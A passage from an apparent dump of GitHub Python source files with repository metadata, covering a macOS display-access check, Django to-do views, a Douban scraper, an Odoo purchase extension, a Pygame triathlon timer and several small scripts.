macOS.\n\n See Also\n ----------\n :func:`is_macos`\n Further details.\n '''\n\n # Avoid circular import dependencies.\n from betse.util.os import oses\n\n # If the current platform is *NOT* macOS, raise an exception.\n if not is_macos():\n raise BetseOSException(f'{oses.get_name()} not macOS.')\n\n# ....................{ TESTERS }....................\n@func_cached\ndef is_macos() -> bool:\n '''\n ``True`` only if the current platform is Apple macOS, the operating\n system previously known as \"OS X.\"\n '''\n\n return platform.system() == 'Darwin'\n\n\n@func_cached\ndef is_aqua() -> bool:\n '''\n ``True`` only if the current process has access to the Aqua display server\n specific to macOS, implying this process to be headfull and hence support\n both CLIs and GUIs.\n\n See Also\n ----------\n https://developer.apple.com/library/content/technotes/tn2083/_index.html#//apple_ref/doc/uid/DTS10003794-CH1-SUBSECTION19\n \"Security Context\" subsection of \"Technical Note TN2083: Daemons and\n Agents,\" a psuedo-human-readable discussion of the\n ``sessionHasGraphicAccess`` bit flag returned by the low-level\n ``SessionGetInfo()`` C function.\n '''\n\n # Avoid circular import dependencies.\n from betse.util.path.files import is_file\n from betse.util.os.command.cmdexit import SUCCESS\n\n # If the current platform is *NOT* macOS, return false.\n if not is_macos():\n return False\n # Else, the current platform is macOS.\n\n # If the system-wide Macho-O shared library providing the macOS\n # security context for the current process does *NOT* exist (after\n # following symbolic links)...\n if not is_file(_SECURITY_FRAMEWORK_DYLIB_FILENAME):\n # Emit a non-fatal warning. Theoretically, this shared library should\n # *ALWAYS* exist across all macOS versions (including those still\n # actively maintained as of 2023 Q2). Pragmatically, this shared library\n # appears to *NOT* exist (for unknown reasons) on GitHub Actions macOS\n # runners. 
We have no control over GitHub Actions. Let's complain! \\o/\n        log_warning(\n            'macOS shared library \"%s\" not found.',\n            _SECURITY_FRAMEWORK_DYLIB_FILENAME)\n\n        # Return false.\n        return False\n    # Else, this shared library exists.\n\n    # Attempt all of the following in a safe manner catching, logging, and\n    # converting exceptions into a false return value. This tester is *NOT*\n    # mission-critical and hence should *NOT* halt the application on\n    # library-specific failures.\n    try:\n        # Dynamically load this library into the address space of this process.\n        security_framework = CDLL(_SECURITY_FRAMEWORK_DYLIB_FILENAME)\n\n        # Possibly non-unique identifier of the security session to request the\n        # attributes of, signifying that of the current process.\n        session_id = _SECURITY_SESSION_ID_CURRENT\n\n        # Unique identifier of the requested security session, returned\n        # by reference from the SessionGetInfo() C function called below. This\n        # identifier is useless for our purposes and hence ignored below.\n        session_id_real = c_int(0)\n\n        # Attributes bit field of the requested security session, returned by\n        # reference from the SessionGetInfo() C function called below.\n        session_attributes = c_int(0)\n\n        # C-style error integer returned by calling the SessionGetInfo() C\n        # function exported by this Macho-O shared library, passing:\n        #\n        # * The input non-unique session identifier by value.\n        # * The output unique session identifier by reference.\n        # * The output session attributes integer by reference.\n        session_errno = security_framework.SessionGetInfo(\n            session_id, byref(session_id_real), byref(session_attributes))\n\n        # This process has access to the Aqua display server if and only if...\n        return (\n            # The above function call succeeded *AND*...\n            session_errno == SUCCESS and\n            # The session attributes bit field returned by this call has the\n            # corresponding bit flag enabled.\n            session_attributes.value & _SECURITY_SESSION_HAS_GRAPHIC_ACCESS\n        )\n    # If the above logic failed with any exception...\n    except Exception as exception:\n        # Human-readable exception message harvested from this exception,\n        # defined as either:\n        # * If this exception is a platform-specific \"OSError\" (as is likely due\n        #   to calling low-level platform-specific macOS kernel functions\n        #   above), the \"OSError.strerror\" instance variable of this exception.\n        # * Else, the standard string representation of this exception.\n        exception_message = getattr(exception, 'strerror', str(exception))\n\n        # Log a non-fatal warning informing users of this failure.\n        log_warning(\n            'macOS SessionGetInfo() function failed, as %s.', exception_message)\n\n        # Assume this process to *NOT* have access to the Aqua display server.\n        return False\n","repo_name":"betsee/betse","sub_path":"betse/util/os/brand/macos.py","file_name":"macos.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"39"} +{"seq_id":"23723038205","text":"from sqlalchemy import (Column, Integer)\nfrom sqlalchemy.orm import relationship\n\nfrom typing import List\nfrom .base import Base\nfrom .mixins import DateTimeMixin, UUIDidMixin\nfrom src.models.claim_line_item import ClaimLineItem\nfrom src.models.claim import Claim\n\n\nclass Plan(Base, DateTimeMixin, UUIDidMixin):\n    __tablename__ = 'plans'\n\n    vaccines = Column(Integer, nullable=False)\n    wellness_exam = Column(Integer, nullable=False)\n    blood_test = Column(Integer, nullable=False)\n\n    # Return claims for a comparison of 
utilization\n claims: List[Claim] = relationship(\n \"Claim\",\n cascade=\"save-update, merge, delete\"\n )\n\n # Determine utilizations based on matching the ClaimLineItem \n # against the Line Item being \"approved\"\n @property\n def vaccine_utilization(self):\n line_items = self.claims[0].line_items\n\n for line_item in line_items:\n if line_item.claim_line_item_type == ClaimLineItem.ClaimLineItemTypeEnum.vaccine and line_item.decision == \"approved\":\n return line_item.quantity\n \n @property\n def blood_test_utilization(self):\n line_items = self.claims[0].line_items\n\n for line_item in line_items:\n if line_item.claim_line_item_type == ClaimLineItem.ClaimLineItemTypeEnum.blood_test and line_item.decision == \"approved\":\n return line_item.quantity\n \n @property\n def wellness_exam_utilization(self):\n line_items = self.claims[0].line_items\n\n for line_item in line_items:\n if line_item.claim_line_item_type == ClaimLineItem.ClaimLineItemTypeEnum.wellness_exam and line_item.decision == \"approved\":\n return line_item.quantity\n\n\n\n\n","repo_name":"DLzer/pk-fs-eval","sub_path":"backend/src/models/plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"4754796481","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n# @Time : 2022/11/11 下午6:27\n# @Author : Jianwei Yang\n# @File : gen_icpr_infos.py\n# @Project: mmtracking\n\"\"\"\n\nimport argparse\nimport glob\nimport os\nimport os.path as osp\nimport time\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Generate the information of ICPR dataset')\n parser.add_argument(\n '-i',\n '--input',\n help='root directory of ICPR dataset',\n )\n parser.add_argument(\n '-o',\n '--output',\n help='directory to save text file',\n )\n parser.add_argument(\n '-d',\n '--datatype',\n help='the datastyle of ICPR dataset(training or validation)'\n )\n return parser.parse_args()\n\n\ndef gen_data_infos(data_root, save_dir, datatype):\n \"\"\"Generate dataset information.\n\n Args:\n data_root (str): The path of dataset.\n save_dir (str): The path to save the information of dataset.\n \"\"\"\n print('Generate the information of ICPR dataset...')\n start_time = time.time()\n\n subdir = datatype\n videos_list = os.listdir(osp.join(data_root, subdir))\n videos_list = [\n x for x in videos_list if osp.isdir(osp.join(data_root, subdir, x))\n ]\n\n if not osp.isdir(save_dir):\n os.makedirs(save_dir, exist_ok=True)\n\n videos_list = sorted(videos_list)\n with open(osp.join(save_dir, f'icpr_{datatype}_infos.txt'), 'w') as f:\n f.write('The format of each line in this txt is '\n '(video_path,annotation_path,start_frame_id,end_frame_id)')\n for video_name in videos_list:\n video_path = osp.join(datatype, video_name)\n\n ann_dir_path = osp.join(datatype, video_name, 'sot')\n ann_files = glob.glob(osp.join(data_root, ann_dir_path, '*.txt'))\n ann_files = sorted(ann_files, key=lambda x: int(osp.basename(x).split('.')[0].split('_')[0]))\n\n split_num = len(data_root)\n for ann_path in ann_files:\n start_frame_id = osp.basename(ann_path).split('.')[0].split('_')[1]\n end_frame_id = osp.basename(ann_path).split('.')[0].split('_')[2]\n ann_path_final = ann_path[split_num+1:]\n video_path_final = video_path + '/img1'\n\n f.write(f'\\n{video_path_final},{ann_path_final},{start_frame_id},{end_frame_id}')\n\n print(f'Done! 
({time.time() - start_time:.2f} s)')\n    print(f'The results are saved in {save_dir}')\n\n\ndef main():\n    args = parse_args()\n    gen_data_infos(args.input, args.output, args.datatype)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Mr-IronMan/mmtracking","sub_path":"tools/convert_datasets/ICPR/gen_icpr_infos.py","file_name":"gen_icpr_infos.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"14024181491","text":"from custom_error_classes import DateInputError\n\n\ndef looking_for_date(input_string):\n    check_for_date = False\n    for data in input_string:\n        if len(data) == 10 and data[2] == '.' and data[5] == '.':\n            str_replace = data.replace('.', '')\n            if str_replace.isdigit():\n                check_for_date = True\n    if not check_for_date:\n        raise DateInputError('ERROR! Date of birth was not entered in dd.mm.yyyy format\\n')\n","repo_name":"AlevtinAntonov/exeption","sub_path":"seminar_3/looking_for_date.py","file_name":"looking_for_date.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72753646195","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom webapp.models import To_Do_list, STATUS_CHOICES\nfrom webapp.forms import TaskForm\nfrom django.http import HttpResponseNotAllowed\n\n\ndef task_list(request):\n    data = To_Do_list.objects.all()\n    return render(request, 'index_to_do.html', context={\n        'task_list': data\n    })\n\n\ndef task_view(request, pk):\n    task = get_object_or_404(To_Do_list, pk=pk)\n    context = {'task': task}\n    return render(request, \"task.html\", context)\n\n\ndef task_delete_view(request, pk):\n    task = get_object_or_404(To_Do_list, pk=pk)\n    if request.method == 'GET':\n        return render(request, 'delete.html', context={'task': task})\n    elif request.method == 'POST':\n        task.delete()\n        return redirect(\"task_list\")\n\n\ndef task_create_view(request, *args, **kwargs):\n    if request.method == \"GET\":\n        return render(request, 'task_create.html', context={\n            'form': TaskForm()\n        })\n    elif request.method == 'POST':\n        form = TaskForm(data=request.POST)\n        if form.is_valid():\n            summary = form.cleaned_data['summary']\n            description = form.cleaned_data['description']\n            status = form.cleaned_data['status']\n            completion_time = form.cleaned_data['completion_time']\n            if completion_time:\n                task = To_Do_list.objects.create(summary=summary, description=description,\n                                                 completion_time=completion_time,\n                                                 status=status)\n            else:\n                task = To_Do_list.objects.create(summary=summary, description=description,\n                                                 status=status)\n            return redirect('task_view', pk=task.pk)\n        else:\n            return render(request, 'task_create.html', context={'form': form})\n    else:\n        return HttpResponseNotAllowed(permitted_methods=['GET', 'POST'])\n\n\ndef task_update_view(request, pk):\n    task = get_object_or_404(To_Do_list, pk=pk)\n    if request.method == \"GET\":\n        form = TaskForm(data={\n            'status': task.status,\n            'summary': task.summary,\n            'description': task.description,\n            'completion_time': task.completion_time\n        })\n        return render(request, 'task_update.html', context={'form': form, 'task': task})\n    elif request.method == 'POST':\n        form = TaskForm(data=request.POST)\n        if form.is_valid():\n            task.status = form.cleaned_data['status']\n            task.summary = form.cleaned_data['summary']\n            task.description = form.cleaned_data['description']\n            task.completion_time = form.cleaned_data['completion_time']\n            task.save()\n            return redirect('task_view', pk=task.pk)\n        else:\n            return render(request, 'task_update.html', context={'task': task, 'form': form})\n    else:\n        return HttpResponseNotAllowed(permitted_methods=['GET', 'POST'])\n\n\n","repo_name":"Illarionov81/python_group_5_homework_45_Alexander_Illarionov","sub_path":"source/webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26771120402","text":"\"\"\"added invoice model\n\nRevision ID: a15fe29fe566\nRevises: bdb82b2b0eb0\nCreate Date: 2016-04-14 20:44:53.860856\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'a15fe29fe566'\ndown_revision = 'bdb82b2b0eb0'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('invoices',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('owner_id', sa.Integer(), nullable=False),\n    sa.Column('ref_num', sa.Integer(), nullable=False),\n    sa.Column('issued_on', sa.DateTime(), nullable=False),\n    sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    ### end Alembic commands ###\n\n\ndef downgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.drop_table('invoices')\n    ### end Alembic commands ###\n","repo_name":"skazi0/yaia","sub_path":"migrations/versions/a15fe29fe566_added_invoice_model.py","file_name":"a15fe29fe566_added_invoice_model.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"24789182044","text":"#!/usr/bin/python\nimport subprocess, os, sys\n \nsize = [10,20,40,80,100,200,400,800,1600,3200,6400,12800,25600,51200,102400,204800,409600,819200,1638400,3276800]\ntab = [\"Reversed\",\"Shuffle\",\"Normal\"]\n \nif not os.path.isdir(\"./io/saidas/\" + \"Conta_inversao\" + \"/\"):\n    os.makedirs(\"./io/saidas/\" + \"Conta_inversao\" + \"/\")\n \nfor y in tab:\n    saida = \"./io/saidas/Conta_inversao/\" + \"saida_\" + y.lower() + \".csv\"\n    fp=open(saida, \"w+\")\n    for z in size:\n        # entrada = \"Entradas/ent_\" + y + \"_\" + str(z) + \".txt\"\n        inpath = \"./io/entradas/\" + y + \"/\"\n        infile_name = inpath + str(z) + \"_\" + y.lower() + \".txt\"\n        cmd = \" ./bin/\" + mode.lower() + \".out < \" + infile_name\n        p = subprocess.Popen(cmd,stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n        line = \"\"\n        for aux in iter(p.stdout.readline, b''):\n            line = str(aux.rstrip())\n            break\n        aux = line.split(\"'\")\n        print(aux[1], file=fp)","repo_name":"diegomarq/PAA-UnB","sub_path":"trab2/util/run_containversao.py","file_name":"run_containversao.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1768388166","text":"j=int(input())\r\nb=list(map(int,input().split()))\r\nl=[]\r\nm=[]\r\nn=[]\r\nc=0\r\nd=1\r\nwhile(c<100000):\r\n    l.append(c)\r\n    c+=2\r\nwhile(d<100000):\r\n    m.append(d)\r\n    d+=2\r\nfor i in range(j):\r\n    if((b[i] in l) and (i in m)):\r\n        n.append(b[i])\r\n    elif((b[i] in m) and (i in l)):\r\n        n.append(b[i])\r\nprint(\" \".join(map(str,n)))\r\n","repo_name":"Avaneeshj/hunter","sub_path":"07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71757598192","text":"words = []\nlongest = 0\ncolumn = 
''\n\nfor _ in range(5):\n row = input()\n words.append(row)\n if len(row) > longest:\n longest = len(row)\nfor i in range(longest):\n for j in range(5):\n if words[j]:\n column += words[j][0]\n words[j] = words[j][1:]\nprint(column)","repo_name":"athletejuan/TIL","sub_path":"Algorithm/BOJ/08_string/10798.py","file_name":"10798.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"35770534071","text":"#导入工具\nimport turtle\nimport random\nimport time\n\n#设置画笔\nt = turtle.Turtle()\nt.pensize(1)\nt.ht()\nt.speed(0)\nt1 = turtle.Turtle()\nt1.ht()\nt1.left(90)\n\n#绘制小方格的函数\ndef square(x, y, c):\n t.color(c)\n t.penup()\n t.goto(x, y)\n t.pendown()\n t.begin_fill()\n for x in range(4):\n t.forward(50)\n t.right(90)\n t.end_fill()\n\n\n#创建列表存放位置,分别是左上, 右上, 左下, 右下\n# local = [[-25, 25], [25, 25], [-25, -25], [25, -25]]\n\n#调用函数绘制四个小方格\nsquare(-50, 50, \"pink\")\nsquare(0, 50, \"green\")\nsquare(-50, 0, \"orange\")\nsquare(0, 0, \"purple\")\n\n#控制海龟位置的函数\ndef drawer(x):\n t1.penup()\n if x == 1:\n t1.goto(-25, 25)\n elif x == 2:\n t1.goto(25, 25)\n elif x == 3:\n t1.goto(-25, -25)\n else:\n t1.goto(25, -25)\n t1.pendown()\n t1.st()\n t1.shape(\"turtle\")\n time.sleep(0.5)\n t1.ht()\n\n#开始---------------------------------------------------------------\n# #调用函数让小海龟移动\n# drawer(1)\n# drawer(2)\n# drawer(3)\n# drawer(4)\nt2 = turtle.Turtle()\nwhile True:\n s = \"\"\n for x in range(4):\n area = random.randint(1, 4)\n drawer(area)\n s += str(area)\n\n a = input(\"请输入海龟的出现次序: \")\n if s == a:\n t2.write(\"祝贺你, 回答正确\", font=(\"arial\", 12))\n break\n else:\n t2.write(\"别灰心, 再试一次\", font=(\"arial\", 12))\n time.sleep(3)\n t2.clear()\n\n#结束-----------------------------------------------\n#持续显示\nturtle.done()\n","repo_name":"18265742937/P2_Class","sub_path":"VipCode/Class/Python/LCP_VipCode__P1/LCP_VipCode__PJ/unit5/class44.py","file_name":"class44.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2678059980","text":"import pygame\nimport numpy as np\nimport time\nfrom random import randint\nimport datetime\nfrom os.path import exists\nfrom copy import deepcopy\nfrom Participant import Participant\nfrom ParticipantButton import * \n \npygame.init()\nglobal participants\nparticipants = []\n#global deltagare_lista\nglobal fuck_it_ofsett_x\nglobal fuck_it_ofsett_y\nfuck_it_ofseff_x = 100\nfuck_it_ofseff_y = 0\nWIDTH, HEIGHT = 1400, 800\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\nfont = pygame.font.SysFont(\"Arial\", 15)\npygame.display.set_caption(\"main window\")\nWHITE = (255,255,255)\nFPS = 20\n\n\n#alla deltagare får en knapp tillägnat sig. Just nu gör knappen ingenting mer än att byta färg när man klickar på den. Tanken är att knappen ska fungera som en start och slutklocka. 
\n\ndef start_group(group):\n for button in participant_buttons: \n if button.participant.start_group == group:\n button.start()\n\ndef minuts_and_sec_as_str_to_sec(str):\n str_parts = str.split(\":\")\n str_parts[0] = int(str_parts[0])\n str_parts[1] = int(str_parts[1])\n seconds = str_parts[0]*60+str_parts[1]\n return seconds\n\ndef sec_as_str_to_minuts_and_sec(str):\n tot_sec = int(str)\n min = int(tot_sec//60)\n sec = tot_sec%60\n min_and_sec = str(min)+\":\"+str(sec)\n return min_and_sec\n\n\n\n#ladda in fil och skapa deltagare_lista\ndef set_up(file_name):\n tmp = []\n f = open(file_name, \"r\")\n for x in f:\n y = x.split()\n if len(y) < 3:\n continue\n #formatet på datetime lägger till ett mellanslag/elemet. Sätter ihop elementen och tar bort det \"onödiga\" elementet.\n if len(y) > 11:\n y[5] = y[5] + \" \" + y[6]\n del y[6]\n y[6] = y[6] + \" \" + y[7]\n del y[7]\n #gissad_tid formatering\n try:\n y[1] = int(y[1])\n except ValueError:\n # Handle the exception\n if \":\" in y[1]:\n y[1] = minuts_and_sec_as_str_to_sec(y[1])\n else:\n y[0] = \"*\" + y[0]\n y[1] = 100000\n \n if y[2] == \"True\":\n y[2] = True\n else: \n y[2] = False\n if y[3] == \"True\":\n y[3] = True\n else: \n y[3] = False\n if y[4] == \"True\":\n y[4] = True\n else: \n y[4] = False\n if y[5] == \"0\" or len(y)==5 or y[5] == \"start_tid\":\n tmp.append(Participant(y[0], y[1], y[2], y[3], y[4]))\n continue\n else:\n #2022-06-20 11:40:15.846478\n y[5] = datetime.datetime.strptime(y[5], \"%Y-%m-%d %H:%M:%S.%f\" )\n if y[6] == \"0\" or len(y)==5 or y[6] == \"slut_tid\":\n y[6] = None\n else:\n y[6] = datetime.datetime.strptime(y[6], \"%Y-%m-%d %H:%M:%S.%f\")\n if y[7] == \"0\" or y[7]==\"-1\" or len(y)==5 or y[7] == \"procentuell_skilnad\":\n y[7] = -1\n if y[8] == \"True\":\n y[8] = True\n else:\n y[8] = False\n \n if y[10] == \"True\":\n y[10] = True\n else:\n y[10] = False\n\n #tmp = name, gissda_tid, cykla, springa, simma, start_tid, slut_tid, procentruell_skilnad, fortfarande_aktiv, start_grupp, startat\n tmp.append(Participant(y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10]))\n print(\"just nu är ser deltagarlistan ut som följer:\", tmp)\n return tmp\n\n#skapa knappar för alla deltagare i deltagare_lista\ndef set_up_buttons():\n buttons = []\n i = 0\n j = 40\n for participant in participants:\n buttons.append(Participant_Button(participant, (i,j)))\n j += 30\n if j>HEIGHT-100:\n i += 500\n j = 40\n return buttons\n\n#skapa korrekt formaterad backup fil\ndef back_up(lista):\n tid = datetime.datetime.now().strftime(\"%H:%M:%S\")+\".txt\"\n f = open(tid, \"w\")\n for participant in lista:\n f.write(participant.to_file())\n f.close()\n return\n\n#skapa en \"snyggare\" fil\ndef back_up_simpel(lista,version):\n tid = datetime.datetime.now().strftime(\"%H:%M:%S\")+version+\".txt\"\n f = open(tid, \"w\")\n for participant in lista:\n f.write(participant.to_file_simple())\n f.close()\n return\n#end back_up\n\n#bubbelsort, går att optimera lite granna\ndef sortera():\n quickest = []\n best = []\n\n for participant in participants:\n participant.calculate_result()\n\n quickest = deepcopy(participants)\n best = deepcopy(participants)\n\n for i in range(len(participants)-1):\n for j in range(len(participants)-1):\n if best[j].difference_as_percentage > best[j+1].difference_as_percentage:\n best[j], best[j+1] = best[j+1], best[j]\n\n # for i in range(len(quickest)): #i = [1,2,3,4,5,6,7,8,9,10,11,13,14]\n # if not quickest[i].do_all_three:\n # del quickest[i]\n # i=i-1\n i = 0 \n while i < len(quickest): \n 
if not quickest[i].do_all_three:\n del quickest[i]\n i -= 1\n i += 1\n\n for i in range(len(quickest)-1):\n for j in range(len(quickest)-1):\n if quickest[j].difference > quickest[j+1].difference:\n quickest[j],quickest[j+1] = quickest[j+1], quickest[j]\n\n print(\"Snabbast: \\n\", quickest) #skriv ut resultatet i terminalen\n print(\"Bäst gissat: \\n\", best)\n back_up(quickest) #skriv in resultatet i en txt-fil\n back_up(best)\n back_up_simpel(quickest, \"snabbast\")\n back_up_simpel(best, \"bäst gissat\")\n\n#end sortera\n\ndef sort_by_name():\n for i in range(len(participants)-1):\n for j in range(len(participants)-1):\n current = participants[j]\n next = participants[j+1]\n if str(current.start_group)+current.name > str(next.start_group)+next.name:\n participants[j], participants[j+1] = participants[j+1], participants[j]\n print(participants) #skriv ut resultatet i terminalen\n back_up(participants) #skriv in resultatet i en txt-fil\n\ndef fuckit():\n print(\"startgrupp namn gissad_tid alla_grenar(y/n)\")\n #inputs = input()\n inputs = \"2 Jakob 30:30 n\"\n inputs = inputs.split()\n if len(inputs) != 4:\n print(\"malformed input\")\n return \n try:\n inputs[2] = int(inputs[2])\n except ValueError:\n # Handle the exception\n if \":\" in inputs[2]:\n inputs[2] = minuts_and_sec_as_str_to_sec(inputs[2])\n \n if inputs[3]==\"n\":\n bike=False\n else:\n bike=True\n\n participants.append(Participant(inputs[1], inputs[2], bike, True, True, datetime.datetime.fromtimestamp(0.000001), datetime.datetime.fromtimestamp(0.000001), -1 , False, inputs[0], False))\n \n global fuck_it_ofseff_y\n global fuck_it_ofseff_x\n participant_buttons.append(Participant_Button(participants[-1],(WIDTH-fuck_it_ofseff_x,HEIGHT-fuck_it_ofseff_y)))\n fuck_it_ofseff_y = fuck_it_ofseff_y+30\n\ndef main():\n global fuck_it_ofseff_y\n fuck_it_ofseff_y = 40\n global fuck_it_ofseff_x\n fuck_it_ofseff_x = 300\n global participants #VARFÖR BEHÖVS DENNA?! 
ÄR JU DEKLARERAD GLOBAL LÄNGD UPP I KODEN?!\n participants = set_up(\"deltagare.txt\")\n sort_by_name() #soterar listan i bokstavsordning\n global participant_buttons\n participant_buttons = set_up_buttons()\n clock = pygame.time.Clock()\n run = True\n input_box = pygame.Rect(0, 0, 140, 40)\n color_inactive = pygame.Color('lightskyblue3')\n color_active = pygame.Color('dodgerblue2')\n color = color_inactive\n active = False\n text = ''\n comando = \"\"\n\n while run:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n back_up(participants)\n # lägg till så back-up fil skapas\n run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if input_box.collidepoint(event.pos):\n active = not active\n else:\n active = False\n color = color_active if active else color_inactive\n if event.type == pygame.KEYDOWN:\n if active:\n if event.key == pygame.K_RETURN:\n print(text)\n comando = text\n text = ''\n elif event.key == pygame.K_BACKSPACE:\n text = text[:-1]\n else:\n text += event.unicode\n\n for button in participant_buttons:\n button.click(event)\n #button1.click(event)\n\n #end for event in pygame\n\n if comando == \"resultat\":\n sortera()\n comando = \"\"\n elif comando == \"add competetor\":\n #todo\n x = 6\n elif comando == \"redo set-up\":\n print(\"skriv filname i terminalen\")\n file_name = input()\n if exists(file_name):\n participants = set_up(file_name)\n set_up_buttons()\n comando = \"\"\n elif comando == \"f\":\n fuckit()\n comando = \"\"\n elif comando[0:5] == \"start\":\n comando = comando.split()\n print(\"startade grupp: \" + comando[-1])\n start_group(comando[-1])\n comando = \"\"\n elif comando == \"sluta alla\":\n for button in participant_buttons:\n button.start()\n print(\"sover\")\n time.sleep(2)\n print(\"vaknat\")\n for button in participant_buttons:\n button.fin()\n comando = \"\"\n \n\n #WIN.fill((WHITE))\n WIN.fill((1, 1, 1))\n # Render the current text.\n txt_surface = font.render(text, True, color)\n # Resize the box if the text is too long.\n width = max(200, txt_surface.get_width()+10)\n input_box.w = width\n #button1.show()\n # Blit the text.\n\n for button in participant_buttons:\n button.show(WIN)\n\n \n\n WIN.blit(txt_surface, (input_box.x+5, input_box.y+5))\n # Blit the input_box rect.\n pygame.draw.rect(WIN, color, input_box, 2)\n pygame.display.flip()\n\n #draw_window()\n #end while run\n pygame.quit()\n#end main()\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"svenssom/Triathlon3","sub_path":"triatlon.py","file_name":"triatlon.py","file_ext":"py","file_size_in_byte":10300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74242188269","text":"import requests\nimport json\n\n\ndef Douban():\n url = \"https://movie.douban.com/j/chart/top_list\"\n\n header = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'\n }\n\n param = {\n 'type': '24',\n 'interval_id': '100:90',\n 'action': '',\n 'start': '0',\n 'limit': '20'\n }\n\n repose = requests.get(url=url, params=param, headers=header)\n list_data = repose.json()\n\n with open('./douban.json', 'w', encoding='utf-8') as fp:\n json.dump(list_data, fp=fp, ensure_ascii=False)\n print(list_data)\n\n\nif __name__ == '__main__':\n 
Douban()\n","repo_name":"Yang-Jianlin/python-learn","sub_path":"python_BB/pachong/豆瓣.py","file_name":"豆瓣.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29554689357","text":"import json\n\nfrom eptools.people import fetch_users\n\nfetch_data = False\ntalks_json = 'talks_with_votes.json'\nusers_json = 'users.json'\ntalks = {}\n\nif fetch_data:\n _ = fetch_users (users_json)\n _ = fetch_talks_json(talks_json, conf=conf, status=talks_status, host=host, with_votes=True)\n\nusers = dict(json.load(open(users_json)).items())\ntype_talks = dict(json.load(open(talks_json)).items())\n_ = [talks.update(talkset) for ttype, talkset in type_talks.items()]\n\nlow_vote = 3.0\nlow_voters = set()\n\nfor tid, talk in talks.items():\n talk_low_voters = [uid for pair in talk['user_votes'] for uid, v in pair.items() if v < low_vote]\n low_voters |= set(talk_low_voters)\n\n_ = [print(users[uid]['email']) for uid in low_voters]\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/Vote quality check.py","file_name":"Vote quality check.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21145794928","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\n\nclass Po_location_bisnis(models.Model):\n\t_name = 'stock.move'\n\t_inherit = 'stock.move'\n\n\taccount_analytic_id = fields.Many2one(comodel_name='account.analytic.account', \n\t\t\t\t\t\t\t\t\t\tstring='Unit')\n\tanalytic_tag_ids = fields.Many2one(comodel_name='account.analytic.tag',\n\t\t\t\t\t\t\t\t\t\tstring='Lokasi', \n\t\t\t\t\t\t\t\t\t\tdomain=[('analytic_dimension_id.name','=','LOCATION')]\n\t\t\t\t\t\t\t\t\t\t)\n\tbisnis = fields.Many2one(comodel_name='account.analytic.tag',\n\t\t\t\t\t\t\tstring='Bisnis',\n\t\t\t\t\t\t\tdomain=[('analytic_dimension_id.name','=','BUSINESS')]\n\t\t\t\t\t\t\t)\n\n\nclass Orderpurchase(models.Model):\n\t_name = 'purchase.order'\n\t_inherit = 'purchase.order'\n\n\t@api.multi\n\tdef button_confirm(self):\n\n\t\tres = super(Orderpurchase, self).button_confirm()\n\t\tfor x in self:\n\t\t\tfor order in x.order_line:\n\t\t\t\tpick = x.env['stock.picking'].search([('origin','=', x.name),('picking_type_code','=','incoming')])\n\t\t\t\tmove = x.env['stock.move'].search([('picking_id','=', pick.id),('product_id','=', order.product_id.id)])\n\t\t\t\n\t\t\t\tfor m in move:\n\t\t\t\t\tfor y in pick :\n\t\t\t\t\t\tm.account_analytic_id = order.account_analytic_id\n\t\t\t\t\t\tm.analytic_tag_ids = order.lokasi\n\t\t\t\t\t\tm.bisnis = order.bisniss\n\n\t\treturn res","repo_name":"rahmansaleh7/vit_po_location_bisnis","sub_path":"models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21893353995","text":"from modules.email.smtp_send import send_email_from_config\nfrom modules.email.make_new_emails import new_email_nonmultipart\n\n\ndef 